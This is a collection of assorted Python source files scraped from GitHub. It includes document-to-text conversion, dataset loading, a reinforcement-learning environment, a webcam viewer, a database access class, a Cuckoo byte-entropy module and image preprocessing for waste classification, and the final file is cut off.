BeautifulSoup(xml_content.decode('gb18030'))\n textStrings = wordObj.findAll(\"w:t\")\n for textElem in textStrings:\n print(textElem.text)\n return textElem\n\ndef _read_doc(url):\n doc_file = url\n text_file = '%s.txt' % os.path.splitext(doc_file)[0]\n os.system(\"catdoc %s > %s\" % (doc_file, text_file))\n f = open(text_file, 'r')\n content = f.read()\n f.close()\n print (content)\n os.system('rm %s' % text_file)\n return content\n\ndef read_word_file(url):\n file_type=os.path.splitext(url)[1]\n file_type=file_type.replace('.','')\n print(file_type)\n if file_type=='doc':\n txt=_read_doc(url)\n return txt\n elif file_type=='docx':\n txt=_read_docx(url)\n return txt\n else:\n print('It is not word file')\n return\n\nfd=read_word_file(url) \n","repo_name":"davischan3168/webdata","sub_path":"otherscript/wordx2txt.py","file_name":"wordx2txt.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"29977288683","text":"import pandas\nimport numpy as np\nimport importlib.resources\nimport zipfile\nimport os\nimport logging\n\n_logger = logging.getLogger(__name__)\n\nLongGlaucVF_20150216_URL = \"http://data.rodrep.com/LongGlaucVF_20150216.zip\" # \"http://localhost:8000/LongGlaucVF_20150216.zip\"\nLongGlaucVF_20150216_FILENAME = \"LongGlaucVF_20150216.zip\"\n\nif not importlib.resources.is_resource(__name__, LongGlaucVF_20150216_FILENAME):\n _logger.error(\"%s does not exist\", LongGlaucVF_20150216_FILENAME)\n _logger.warning(\"Downloading %s from %s\", LongGlaucVF_20150216_FILENAME, LongGlaucVF_20150216_URL)\n _logger.warning(\"By downloading, you agree to the terms of outlined by Rotterdam Ophthalmic Data Repository\")\n _logger.warning(\"Visit http://data.rodrep.com/license.html for more details\")\n\n # Hacky implementation\n dirname, basename = os.path.split(__spec__.origin)\n\n from urllib.request import urlretrieve\n urlretrieve(LongGlaucVF_20150216_URL, os.path.join(dirname, LongGlaucVF_20150216_FILENAME))\n\n _logger.warning(\"Downloaded %s\", LongGlaucVF_20150216_FILENAME)\n\nwith importlib.resources.open_binary(__name__, LongGlaucVF_20150216_FILENAME) as zf:\n root = zipfile.ZipFile(zf)\n with root.open(\"VisualFields.csv\") as f:\n VISUAL_FIELDS = pandas.read_csv(f)\n with root.open(\"VFPoints.csv\") as f:\n VF_POINTS = pandas.read_csv(f)\n\n VF_POINTS_OD = VF_POINTS.merge(VISUAL_FIELDS[[\"STUDY_ID\", \"FIELD_ID\", \"SITE\"]], how=\"left\")\n os_mask = VF_POINTS_OD[\"SITE\"] == \"OS\"\n VF_POINTS_OD[\"STUDY_SITE_ID\"] = VF_POINTS_OD[\"STUDY_ID\"] * 2 - 1 + os_mask # starts from one\n VF_POINTS_OD.loc[os_mask, \"X\"] *= -1\n VF_POINTS_OD.loc[os_mask, \"SITE\"] = \"OD\"\n VF_POINTS_OD = VF_POINTS_OD.sort_values(by=[\"FIELD_ID\", \"Y\", \"X\"], ascending=[True, False, True])\n\n M = 54\n VF_THRESHOLD = VF_POINTS_OD[\"THRESHOLD\"].to_numpy(dtype=np.float32).reshape([-1, M])\n VF_THRESHOLD_SITES = VF_POINTS_OD[\"STUDY_SITE_ID\"].to_numpy(dtype=np.int32).reshape([-1, M])\n VF_THRESHOLD_SITES = VF_THRESHOLD_SITES[:, 0]\n VF_THRESHOLD_INFO = VF_POINTS_OD.iloc[::M, :][[\"FIELD_ID\", \"STUDY_SITE_ID\"]]\n VF_THRESHOLD_INFO = VF_THRESHOLD_INFO.merge(VISUAL_FIELDS, how=\"left\")\n N, M = VF_THRESHOLD.shape\n VF_BLINDSPOTS = (25, 34)\n\n \"\"\"\n 24-2 VF Map, OD coordinates\n 00,01,02,03,\n 04,05,06,07,08, 09,\n 10,11,12,13,14,15, 16, 17,\n 18,19,20,21,22,23,24,(25),26,\n 27,28,29,30,31,32,33,(34),35,\n 36,37,38,39,40,41, 42, 43,\n 44,45,46,47,48, 49,\n 50,51,52,53\n 
\"\"\"\n\n","repo_name":"constructor-s/PyVF","sub_path":"pyvf/resources/rotterdam2013/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} +{"seq_id":"2464888661","text":"# -*- coding: utf-8 -*-\nfrom config import *\nfrom multiprocessing import Queue\n\n\nclass GymBase:\n MAX_MSG = 50\n\n def __init__(self, matrix: np.ndarray,\n ui2env: Queue, env2ui: Queue,\n module=np, convert=np.array):\n assert (matrix == State.Now).sum() == 1\n assert (matrix == State.End).sum() == 1\n self.convert = convert\n self.module = module\n self.matrix = convert(matrix)\n self.bound = matrix.shape\n self.ui2env = ui2env\n self.env2ui = env2ui\n self.start_pos = tuple(self.convert(self.module.where(self.matrix == State.Now)).flatten())\n self.end_pos = tuple(self.convert(self.module.where(self.matrix == State.End)).flatten())\n self.now_pos = self.start_pos\n self.now_pre_state = None\n # 移动历史\n self.history = []\n # self.positions = [self.now_pos]\n self.actions = [0]\n self.rewards = [0]\n\n def reach_end(self):\n return self.end_pos == self.now_pos\n\n def define_move(self):\n # 定义移动属性\n for move_, dir_ in zip(ACTIONS, STEPS):\n setattr(self, move_, self.wrapper(self.step, move_, dir_))\n\n def wrapper(self, fun, signal, *args, **kwargs):\n \"\"\"正常包装器\"\"\"\n\n def wrap():\n return fun(*args, **kwargs)\n\n return wrap\n\n def check_legality(self, delta):\n \"\"\"检查移动合法性\"\"\"\n next_pos = tuple(self.convert(self.now_pos) + delta)\n if all(0 <= next_pos[i] < self.bound[i] for i in range(len(delta))):\n legal = State(int(self.matrix[next_pos]))\n else:\n legal = State.Bnd\n reward = REWARD[legal]\n return legal, reward, next_pos\n\n @classmethod\n def print(cls, x):\n print(f'{cls.__name__} -> {x}')\n\n def record(self, msg, reward=None):\n self.history.insert(0, msg)\n if len(self.history) > self.MAX_MSG:\n self.history.pop(-1)\n self.print(msg)\n if reward is not None:\n self.actions[-1] += 1\n self.rewards[-1] += reward\n\n def step(self, delta):\n \"\"\"移动\"\"\"\n delta = self.convert(delta)\n assert self.module.abs(delta).sum() == 1\n legal, reward, next_pos = self.check_legality(delta)\n if legal in {State.Emp, State.Trp, State.End}:\n old_pos, self.now_pos = self.now_pos, next_pos\n self.record(f'Moved from {old_pos} to {next_pos}', reward)\n # self.positions.append(self.now_pos)\n self.set_state(old_pos, self.now_pre_state if self.now_pre_state else State.Emp)\n self.now_pre_state = self.matrix[next_pos]\n self.set_state(next_pos, State.Now)\n else:\n self.record(f'Illegal move from {self.now_pos} to {next_pos}', reward)\n return reward\n\n def restart(self):\n \"\"\"重启\"\"\"\n self.record(f'{\"Game Ends. \" if self.now_pos == self.end_pos else \"\"}'\n f'Restart. 
Moved from {self.now_pos} to {self.start_pos}')\n self.set_state(self.now_pos, State.Emp)\n self.set_state(self.end_pos, State.End)\n self.set_state(self.start_pos, State.Now)\n # 回归起点\n self.now_pos = self.start_pos\n self.now_pre_state = None\n self.add_moves_rewards()\n\n def set_state(self, pos, state):\n self.matrix[pos] = state\n\n def add_moves_rewards(self):\n self.actions.append(0)\n self.rewards.append(0)\n\n def up(self):\n \"\"\"后续被重载\"\"\"\n\n def down(self):\n \"\"\"后续被重载\"\"\"\n\n def left(self):\n \"\"\"后续被重载\"\"\"\n\n def right(self):\n \"\"\"后续被重载\"\"\"\n","repo_name":"Lalalaashen/DeepReinforcedLearningPlayground","sub_path":"GymBase.py","file_name":"GymBase.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"1452568912","text":"from urls import urlpatterns\nfrom pprint import pprint\n\nwhile True:\n try:\n url, arg = input(\"Вы можете выбрать: listing/, create/, retrieve/, update/, delete/, comment/ \").split(\"/\")\n except ValueError:\n print(\"Enter a valid url\")\n continue\n \n found = False\n for uri, view in urlpatterns:\n if uri.split(\"/\")[0] == url:\n found = True\n try:\n if arg:\n pprint(view(arg))\n else:\n pprint(view())\n except Exception as e:\n print(e)\n if not found:\n print(\"404 Url Not Found\")\n","repo_name":"Beknaz/py21-projekts","sub_path":"first_hackaton/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43324210898","text":"\nclass Write:\n def __init__(self,string,var,errores):\n self.string=string\n self.var=var\n self.errores=errores\n\n def CheckSintax(self):\n data=list(self.string)\n data=self.CheckWrite(data)\n if data :\n if self.CheckParentesis(data):\n self.errores=self.CheckContenido(data=data)\n return self.errores\n self.errores.append('Error en '+self.string)\n return self. 
errores \n \n def DefineSintax(self):\n sintax=[\n \"W\",\n \"r\",\n \"i\",\n \"t\",\n \"e\",\n '(',\n \")\"\n ]\n return sintax\n def CheckWrite(self,string):\n sintax=self.DefineSintax()\n for i in range (0,5):\n if sintax[i]==string[0]:\n string.pop(0)\n else:\n return False\n return string\n def CheckParentesis(self,string):\n if string[0]=='(' and string[len(string)-1]==')':\n string.pop()\n string.pop(0)\n return string\n return False\n\n def CheckContenido(self,data):\n if '\"' in data or \"'\" in data:\n comillas=['\"',\"'\"]\n if data[0] in comillas and data[len(data)-1] in comillas and data[0]==data[len(data)-1]:\n num_comillas=0\n for x in data:\n if x==data[0]:\n num_comillas+=1\n if num_comillas==2:\n self.errores.append(self.CadenaCorrecta())\n return self.errores\n else:\n #check if is a number \n numbers,letters=self.CheckNumbers(data)\n if numbers>0 and letters==0:\n self.errores.append(self.CadenaCorrecta())\n return self.errores\n else :\n if numbers==0 and letters>0:\n #check of the vars exist\n return self.SearchNameVar(data=data)\n self.errores.append('Error en '+self.string)\n return self.errores\n\n def SearchNameVar(self,data):\n aux=\"\"\n for x in data:\n aux+=x\n for i in self.var:\n if i.name==aux:\n self.errores.append(self.CadenaCorrecta())\n return self.errores\n self.errores.append('Error Variable no declarada '+self.string)\n return self.errores\n\n def CheckNumbers(self,data):\n numbers=0\n letter=0\n matrix = [str(x) for x in range(0, 10)]\n for element in data:\n if (element in matrix)==False:\n letter+=1\n else:\n numbers+=1\n return numbers,letter\n\n def CadenaCorrecta(self):\n return 'Cadena correcta '+self.string\n\n\n\n \n\n\n\n\n\n","repo_name":"SamuelNarciso/Analizador_Sintactico","sub_path":"AnalizadorSintactico/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33524613433","text":"import argparse\nimport random\nfrom pathlib import Path\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\n\nimport util.misc as utils\nfrom datasets import build_gen_dataset\nfrom datasets import build_fag_dataset\nfrom engine import evaluate_hoi_fag\nfrom models.hoitr_text import build as build_model\nfrom util.argparser import get_args_parser\n\n\ndef main(args):\n checkpoint = torch.load(args.resume, map_location='cpu')\n tmp_output_dir = args.output_dir\n\n # overwrite args\n args = checkpoint['args']\n args.output_dir = tmp_output_dir\n print(f\"Load model from Epoch {checkpoint['epoch']}\")\n\n # Fix the seed for reproducibility.\n device = torch.device(args.device)\n seed = args.seed + utils.get_rank()\n torch.manual_seed(seed)\n np.random.seed(seed)\n random.seed(seed)\n\n if args.use_fag_setting:\n # FG dataset\n dataset_val = build_fag_dataset(image_set=\"val\", args=args)\n else:\n # GEN-VL-KT dataset\n dataset_val = build_gen_dataset(image_set='val', args=args)\n\n sampler_val = torch.utils.data.SequentialSampler(dataset_val)\n data_loader_val = DataLoader(dataset_val, 8, sampler=sampler_val,\n drop_last=False, collate_fn=utils.collate_fn, num_workers=args.num_workers)\n\n model, _, postprocessors = build_model(args)\n model.to(device)\n\n model.load_state_dict(checkpoint['model'])\n print(f\"Load model from Epoch {checkpoint['epoch']}\")\n\n test_stats = evaluate_hoi_fag(args.dataset_file, model, postprocessors, data_loader_val,\n args.subject_category_id, device, args)\n print(test_stats)\n 
return\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('SentenceHOI training and evaluation script', parents=[get_args_parser()])\n arg = parser.parse_args()\n if arg.output_dir:\n arg.output_dir = arg.output_dir+\"_test\"\n Path(arg.output_dir).mkdir(parents=True, exist_ok=True)\n main(arg)\n","repo_name":"m1stborn/sentence-hoi","sub_path":"test_text_hoitr.py","file_name":"test_text_hoitr.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"106920904","text":"#Importing necessary libraries, mainly the OpenCV, and PyQt libraries\nimport cv2\nimport numpy as np\nimport sys\nfrom PyQt5 import QtCore\nfrom PyQt5 import QtWidgets\nfrom PyQt5 import QtGui\nfrom PyQt5.QtCore import pyqtSignal\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom cv2 import *\n\nclass ShowVideo(QtCore.QObject):\n\n\tcamera_port = 0\n\tcamera = cv2.VideoCapture(camera_port)\n\tVideoSignal = QtCore.pyqtSignal(QtGui.QImage)\n\n\tdef __init__(self, parent = None):\n\t\tsuper(ShowVideo, self).__init__(parent)\n\n\t@QtCore.pyqtSlot()\n\tdef startVideo(self):\n\n\t\trun_video = True\n\t\twhile run_video:\n\t\t\tret, image = self.camera.read()\n\t\t\t\n\t\t\tcolor_swapped_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n\t\t\theight, width, _ = color_swapped_image.shape\n\t\t\t\n\t\t\tqt_image = QtGui.QImage(color_swapped_image.data,\n\t\t\t\t\t\t\t\t\twidth, \n\t\t\t\t\t\t\t\t\theight,\n\t\t\t \t\t\t\t\t\tcolor_swapped_image.strides[0],\n\t\t\t \t\t\t\t\t\tQtGui.QImage.Format_RGB888)\n\n\t\t\tpixmap = QtGui.QPixmap(qt_image)\n\t\t\t# qt_image = pixmap.scaled(750, 600, QtCore.Qt.KeepAspectRatio)\n\t\t\t# qt_image = QtGui.QImage(qt_image)\n\t\t\tqt_image = QtGui.QImage(pixmap)\n\n\t\t\tself.VideoSignal.emit(qt_image)\n\n\tdef startVideo2(self):\n \n\t\trun_video = True\n\t\twhile run_video:\n\t\t\tret, image = self.camera.read()\n\t\t\t\n\t\t\tcolor_swapped_image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n\t\t\tb, g, r = cv2.split(color_swapped_image)\n\t\t\tb_equal = equalizeHist(b)\n\t\t\tg_equal = equalizeHist(g)\n\t\t\tr_equal = equalizeHist(r)\n\t\t\tresult = merge([b_equal, g_equal, r_equal])\n\n\t\t\theight, width, _ = color_swapped_image.shape\n\n\t\t\tqt_image2 = QtGui.QImage(result,\n\t\t\t\t\t\t\t\t\twidth, \n\t\t\t\t\t\t\t\t\theight,\n\t\t\t\t\t\t\t\t\tcolor_swapped_image.strides[0],\n\t\t\t\t\t\t\t\t\tQtGui.QImage.Format_RGB888)\n\n\t\t\tpixmap2 = QtGui.QPixmap(qt_image2)\n\t\t\t# qt_image2 = pixmap2.scaled(750, 600, QtCore.Qt.KeepAspectRatio)\n\t\t\t# qt_image2 = QtGui.QImage(qt_image2)\n\t\t\tqt_image2 = QtGui.QImage(pixmap2)\n\n\t\t\tself.VideoSignal.emit(qt_image2)\n\n\n\nclass ImageViewer(QtWidgets.QWidget):\n\tdef __init__(self, parent = None):\n\t\tsuper(ImageViewer, self).__init__(parent)\n\t\tself.image = QtGui.QImage()\n\t\tself.setAttribute(QtCore.Qt.WA_OpaquePaintEvent)\n\n\tdef paintEvent(self, event):\n\t\tpainter = QtGui.QPainter(self)\n\t\tpainter.drawImage(0,0, self.image)\n\t\tself.image = QtGui.QImage()\n\n\tdef initUI(self):\n\t\tself.setWindowTitle('Test')\n\n\t\n\t@QtCore.pyqtSlot(QtGui.QImage)\n\tdef setImage(self, image):\n\t\tif image.isNull():\n\t\t\tprint(\"viewer dropped frame!\")\n\n\t\tself.image = image\n\t\tif image.size() != self.size():\n\t\t\tself.setFixedSize(image.size())\n\t\tself.update()\n\n\nif __name__ == '__main__':\n\n\tapp = QtWidgets.QApplication(sys.argv)\n\tthread = 
QtCore.QThread()\n\tthread.start()\n\tthread2 = QtCore.QThread()\n\tthread2.start()\n\n\tvid = ShowVideo()\n\tvid.moveToThread(thread)\n\tvid2 = ShowVideo()\n\tvid2.moveToThread(thread2)\n\timage_viewer = ImageViewer()\n\timage_viewer2 = ImageViewer()\n\n\tvid.VideoSignal.connect(image_viewer.setImage)\n\tvid2.VideoSignal.connect(image_viewer2.setImage)\n\n\tpush_button = QtWidgets.QPushButton('Original')\n\tpush_button.clicked.connect(vid.startVideo)\n\tpush_button2 = QtWidgets.QPushButton('Restored')\n\tpush_button2.clicked.connect(vid2.startVideo2)\n\tvertical_layout = QtWidgets.QHBoxLayout()\n\n\tvertical_layout.addWidget(image_viewer)\n\tvertical_layout.addWidget(image_viewer2)\n\tvertical_layout.addWidget(push_button)\n\tvertical_layout.addWidget(push_button2)\n\n\tlayout_widget = QtWidgets.QWidget()\n\tlayout_widget.setLayout(vertical_layout)\n\n\tmain_window = QtWidgets.QMainWindow()\n\tmain_window.setCentralWidget(layout_widget)\n\tmain_window.resize(1000,800)\n\tmain_window.show()\n\tsys.exit(app.exec_())","repo_name":"JialinKang/endoscope_PyQt5","sub_path":"realTime_camera.py","file_name":"realTime_camera.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"8013621930","text":"import os\n\nimport psycopg2.extras\n\n\nclass DAO:\n\n def __init__(self):\n self._cursor = None\n\n @property\n def cursor(self):\n if self._cursor is not None:\n return self._cursor\n\n conn = psycopg2.connect(host=os.environ['POSTGRES_HOST'],\n port=os.environ['POSTGRES_PORT'],\n dbname=os.environ['POSTGRES_DB'],\n user=os.environ['POSTGRES_USER'],\n password=os.environ['POSTGRES_PASSWORD'])\n conn.autocommit = True\n self._cursor = conn.cursor(cursor_factory=psycopg2.extras.DictCursor)\n\n return self._cursor\n\n def close(self):\n if self._cursor:\n self._cursor.connection.close()\n self._cursor.close()\n\n def save_transaction(self, transaction):\n stmt = \"\"\"\n INSERT INTO ally_transactions\n (posted_at, type, description, amount, balance) VALUES\n (%(posted_at)s, %(type)s, %(description)s, %(amount)s, %(balance)s)\n RETURNING id\n \"\"\"\n self.cursor.execute(stmt, transaction)\n\n return self.cursor.fetchone()[0]\n\n def get_last_transaction(self):\n stmt = \"\"\"\n SELECT posted_at, type, description, amount, balance\n FROM ally_transactions order by posted_at desc limit 1\n \"\"\"\n self.cursor.execute(stmt)\n\n row = self.cursor.fetchone()\n\n if row:\n row = dict(row)\n\n return row\n","repo_name":"rchacon/ally","sub_path":"ally/dao.py","file_name":"dao.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"6202864410","text":"n, k = map(int,input().split())\ncoin = []\ndp = [0 for _ in range(k+1)]\n\nfor i in range(n):\n c = int(input())\n if c <= k:\n coin.append(c)\n dp[c] = 1\n\n\nfor i in range(1,k+1):\n a = []\n for j in coin:\n if j <= i and dp[i-j] != -1:\n a.append(dp[i-j])\n if not a:\n dp[i] = -1\n else:\n dp[i] = min(a) + 1\n\nprint(dp[k])","repo_name":"raipier8818/BaekJoon","sub_path":"Python/2294.py","file_name":"2294.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"8515320219","text":"import os\nimport math\nimport logging\nfrom cuckoo.common.abstracts import Processing\nfrom cuckoo.common.objects import File\nlog = logging.getLogger(__name__)\n\nclass ByteFrequencyDistribution(Processing):\n \"\"\"Get byte frequency distribution table & shannon entropy results.\"\"\"\n\n def _get_byte_frequency_table(self, file_path):\n \"\"\"Get byte frequency table dict.\n @param file_path: file path.\n @return: byte frequency table(over 0) dict or None.\n \"\"\"\n try:\n with open(file_path, 'rb') as f:\n data = f.read()\n except IOError as e:\n log.exception(e)\n return {}\n frequency_table = {}\n byte_arr = map(ord, data)\n filesize = len(byte_arr)\n for byte_idx in range(256):\n cnt = 0\n for byte in byte_arr:\n if byte == byte_idx:\n cnt += 1\n if cnt > 0:\n frequency_table[str(format(byte_idx,'02X'))] = round((float(cnt) / filesize) * 100, 3)\n if not frequency_table:\n return {}\n return frequency_table\n\n def _get_shannon_entropy(self, bytefreq):\n \"\"\"Calculate shannon entropy(min bits per byte-character).\n @param bytefreq: byte frequency list.\n @return: shannon entropy float.\n \"\"\"\n ent = 0.0\n for freq in bytefreq:\n freq = freq / 100\n if freq > 0:\n ent = ent + freq * math.log(freq, 2)\n ent = -ent\n return round(ent, 3)\n\n def run(self):\n \"\"\"Run byte frequency distribution analysis.\n @return: analysis results dict or None.\n \"\"\"\n self.key = \"bytefreqdist\"\n if self.task[\"category\"] == \"file\":\n if not os.path.exists(self.file_path):\n return {}\n f = File(self.file_path)\n else:\n return {}\n\n try:\n frequency_table = self._get_byte_frequency_table(f.file_path)\n if frequency_table:\n frequency_table[\"shannon_entropy\"] = self._get_shannon_entropy(frequency_table.values())\n return frequency_table\n except Exception as e:\n log.exception(e)\n return {}\n\n","repo_name":"SCPJaehyeon/byte-frequency-distribution-processing-module","sub_path":"cuckoo/processing/bytes.py","file_name":"bytes.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"11716538733","text":"T = int(input())\r\nfor x in range(T):\r\n n = int(input())\r\n g = int(input())\r\n l1 = str(input()).split()\r\n for g in range(len(l1)):\r\n l1[g] = int(l1[g])\r\n l1.sort()\r\n answer = 0\r\n for y in range(n):\r\n answer += l1[y]\r\n print(answer)\r\n l1 = []\r\n","repo_name":"blackphin/Competitive-Coding","sub_path":"Code Gladiators 2022/Challenge 2.py","file_name":"Challenge 2.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"1959117789","text":"#Import libraries and modules \n\nimport warnings\nwarnings.filterwarnings('ignore',category=FutureWarning) # ignores warnings about future version of numpy\n\n#For JSON data\nimport json\n\n#For interacting with operating system \nimport os\n\n#For copying files\nimport shutil\n\n#For vector/array operations\nimport numpy as np\nfrom numpy import asarray\nfrom random import sample\nimport random \nfrom random import shuffle\nimport math\nfrom time import time\nimport datetime\n\n#For loading and preprocessing images\nfrom PIL import Image \nimport matplotlib.pyplot as plt\n\nprint('Numpy version', np.__version__)\nstart_time = time()\n\n#1.
Dataset exploration \n#Current directory \nprint(os.getcwd())\n\n#1.1 Load annotations: annotations.json[1] contains annotations in COCO[2] format\n\ndata_dir = os.path.join(os.getcwd(), os.pardir, \"data\") #your job: define data_dir\nanno_file = os.path.join(data_dir, \"annotations.json\") #your job: path for *.json file\n\nwith open(anno_file, \"r\") as f: # annotations.json is a nested dictionary (keys are mapped to another dictionary within original dictionary) \n annotations = json.load(f) # your job: parse JSON string \n\n#1.2 Explore annotations dictionary\n#Exercise: explore each annotation key\n\n#Number of images\nlen(annotations[\"images\"])\n\n#Number of annotations \nlen(annotations[\"annotations\"]) \n\n#1.2.1 Question to audience: Explain why there are more annotations than images\n#Image information\nannotations[\"images\"][320]\n\nannotations[\"images\"][1210] #your job: explore the annotation\n\n#1.2.2 Exercise: explore annotation for image_id 6\nfor anno in annotations [\"annotations\"]:\n if anno[\"image_id\"]==6:\n print(anno)\n\nannotations[\"categories\"][11]\n\nfor anno in annotations [\"scene_annotations\"]:\n if anno[\"image_id\"]==6:\n print(anno)\n\n#1.2.3 Exercise for advanced participants: explore nested dictionary in details.\n\n\n#2. Preprocessing\n# For simplicity, we create a simplified dictionary w.r.t to each image and its associated categories. We store only a subset of information, e.g. 'image_id', 'file_name', 'height', 'width', 'category_ids', 'category_names', and 'super_categories'\n\n#2.1 Open annotation file and read into memory\nwith open(anno_file, \"r\") as f:\n annotations = json.load(f)\n\n# 2.2 Prepare category id to name mappings. Items are ordered by category_id, so you can get the\n# category name of a category_id via the category_id, e.g.\n# via annotations[\"categories\"][category_id]\ncategories = annotations[\"categories\"]\n\n#2.3 Create new python dictionary with subset of relevant information (e.g. image -> category data)\ndata = {}\nfor i, item in enumerate(annotations[\"annotations\"]):\n #Map image_id to image filename using the \"images\" part of the dataset.\n image_id = item[\"image_id\"]\n image_info = annotations[\"images\"][image_id]\n file_name = image_info[\"file_name\"]\n height,width = image_info[\"height\"], image_info[\"width\"]\n \n #Map category_id of instance to category name\n category_id = item[\"category_id\"]\n category_info = categories[category_id]\n category_name = category_info[\"name\"]\n super_category = category_info[\"supercategory\"]\n \n #A labeled image can have multiple categories, so check if we have already added to the dictionary (e.g. if it's in the keys)\n if image_id in data.keys():\n data[image_id][\"category_ids\"].add(category_id)\n data[image_id][\"category_names\"].add(category_name)\n data[image_id][\"super_categories\"].add(super_category)\n else:\n data[image_id] = {\"file_name\": file_name, \"category_ids\": {category_id}, \"image_id\": image_id, \"height\": height, \"width\": width, \"category_names\": {category_name}, \"super_categories\": {super_category}}\n\nlen(data)\ndata[320] #labels in particular instance in our dataset (image_id = 320)\n\n#3. Binary Classification\n#We can construct a binary classification problem in a one vs all setting, e.g. does this image contain a specific \n# supercategory or not. 
Let's create the numpy arrays corresponding to the images and labels that we can use for training.\n\n#3.1 Split data into training, validation, and test\n\ndata_ids = list(data.keys())\n\n\n#Configure proportion of training, validation, and test data\ntrain_perc = 0.8\nval_perc = 0.1\ntest_perc = 0.1\ntrain_size=int(len(data_ids)*train_perc)\nval_size=int(len(data_ids)*val_perc)\ntrain_ids, val_ids, test_ids = (\n data_ids[:train_size],\n data_ids[train_size : train_size + val_size],\n data_ids[train_size + val_size :],\n )\n\nprint(\"Number of images in training dataset:\", len(train_ids))\nprint(\"Training image_ids:\", train_ids)\n\nprint(\"Number of images in validation dataset:\", len(val_ids))\nprint(\"Validation image_ids:\", val_ids)\n\nprint(\"Number of images in dataset:\", len(test_ids))\nprint(\"test image_ids:\", test_ids)\n\nprint(len(test_ids))\n\n#3.2 Define helper function for loading data and converting to numpy arrrays\n\ndef load_data(ids, data, supercategory):\n num_instances = len(ids)\n max_height, max_width = 1000, 1000 #TBD revisit max heigh and width\n labels = np.zeros((num_instances,))\n images = np.zeros((num_instances,max_height,max_width))\n\n for i, image_id in enumerate(ids):\n #Convert labels into a binary classification problem (e.g. 0 or 1 depending on the super_category)\n if supercategory in data[image_id][\"super_categories\"]:\n labels[i] = 1\n\n #Load images into numpy arrays\n try: \n image = Image.open(os.path.join(data_dir,data[image_id][\"file_name\"])).convert(\"L\") # Grayscale\n image = image.resize(size=(max_height, max_width))\n images[i] = asarray(image) #Convert and store as numpy array\n\n except Exception as e:\n print(e) #Use this to catch and print exceptions\n return images, labels\n\n#3.3 Define supercategory of interest (in this case 'Bottle') and load training, validation, and test data \nsupercategory = \"Bottle\"\ntrain_images, train_labels = load_data(train_ids, data, supercategory)\nval_images, val_labels = load_data(val_ids, data, supercategory)\ntest_images, test_labels = load_data(test_ids, data, supercategory)\n\nwork_dir = os.path.join(os.getcwd(), \"work_data\") # directory: combination of current directory and saved model string\narr_file_trimg = os.path.join(work_dir, \"train_images\") # path to the trained model to save \narr_file_bl = os.path.join(work_dir, \"train_labels\") # path to the trained model to save\narr_file_valimg = os.path.join(work_dir, \"val_images\") # path to the trained model to save \narr_file_vallabel = os.path.join(work_dir, \"val_labels\") # path to the trained model to save\narr_file_testimg = os.path.join(work_dir, \"test_images\") # path to the trained model to save \narr_file_testlabel = os.path.join(work_dir, \"test_labels\") # path to the trained model to save\n\n#Check if directory exists. 
If not, create it\ntry:\n os.stat(work_dir)\nexcept:\n os.mkdir(work_dir)\n\nnp.save(arr_file_trimg, train_images, allow_pickle=False, fix_imports=False)\nnp.save(arr_file_bl, train_labels, allow_pickle=False, fix_imports=False)\nnp.save(arr_file_valimg, val_images, allow_pickle=False, fix_imports=False)\nnp.save(arr_file_vallabel, val_labels, allow_pickle=False, fix_imports=False)\nnp.save(arr_file_testimg, test_images, allow_pickle=False, fix_imports=False)\nnp.save(arr_file_testlabel, test_labels, allow_pickle=False, fix_imports=False)\n\nend_time = time()\ntotal_time = end_time - start_time\nprint(\"Execution time:\", str(datetime.timedelta(seconds=total_time)))\n\n","repo_name":"khatuka31/Waste_Classification","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":7560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"27073824054","text":"from django_elasticsearch_dsl_drf.constants import (\n LOOKUP_FILTER_RANGE,\n LOOKUP_QUERY_GT,\n LOOKUP_QUERY_GTE,\n LOOKUP_QUERY_IN,\n LOOKUP_QUERY_LT,\n LOOKUP_QUERY_LTE,\n SUGGESTER_COMPLETION,\n)\nfrom django_elasticsearch_dsl_drf.filter_backends import (\n DefaultOrderingFilterBackend,\n FilteringFilterBackend,\n SearchFilterBackend,\n SuggesterFilterBackend,\n)\nfrom django_elasticsearch_dsl_drf.viewsets import DocumentViewSet, Search\nfrom rest_framework.views import APIView\nfrom rest_framework import generics, permissions\nfrom rest_framework import parsers, renderers, status\nfrom rest_framework.response import Response\nfrom .documents import OsosDocument\nfrom .serializers import OsosDocumentSerializer\nfrom .data import msgWithNamedFields\nfrom .models import Osos\n\nclass OsosInsertData(APIView):\n queryset = Osos.objects.all()\n model = Osos\n serializer_class = OsosDocumentSerializer\n permission_classes = [permissions.AllowAny]\n\n def get(self, request, *args, **kwargs):\n data = msgWithNamedFields\n if type(data) == dict:\n 